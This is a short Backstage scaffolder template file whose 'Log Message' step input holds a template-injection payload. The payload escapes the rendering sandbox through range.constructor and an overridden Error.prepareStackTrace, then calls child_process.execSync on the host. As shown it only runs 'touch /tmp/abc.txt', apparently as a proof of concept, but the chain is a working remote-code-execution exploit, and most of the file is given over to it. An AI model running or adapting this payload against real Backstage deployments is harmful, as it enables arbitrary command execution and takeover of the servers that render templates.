apiVersion: abc/1
kind:Template
metadata:
  name: template-name
  title: template-title
  description: This is a sample template 
spec:
  owner: backstage/techdocs-core
  type: service
  steps:
    - id: log-message
      name: Log Message 
      action: debug:log
      input:
        message: Hello ${{range.constructor("this.env.__proto__.renderString = function() {globalThis.OldError = globalThis.Error;globalThis.Error = class Error {};globalThis.Error.prepareStackTrace = (cs,trace) => {trace[2].getThis().process.mainModule.require(\"child_process\").execSync(\"touch /tmp/abc.txt\");};const {stack} = new globalThis.OldError();}")().triggerException()}} 


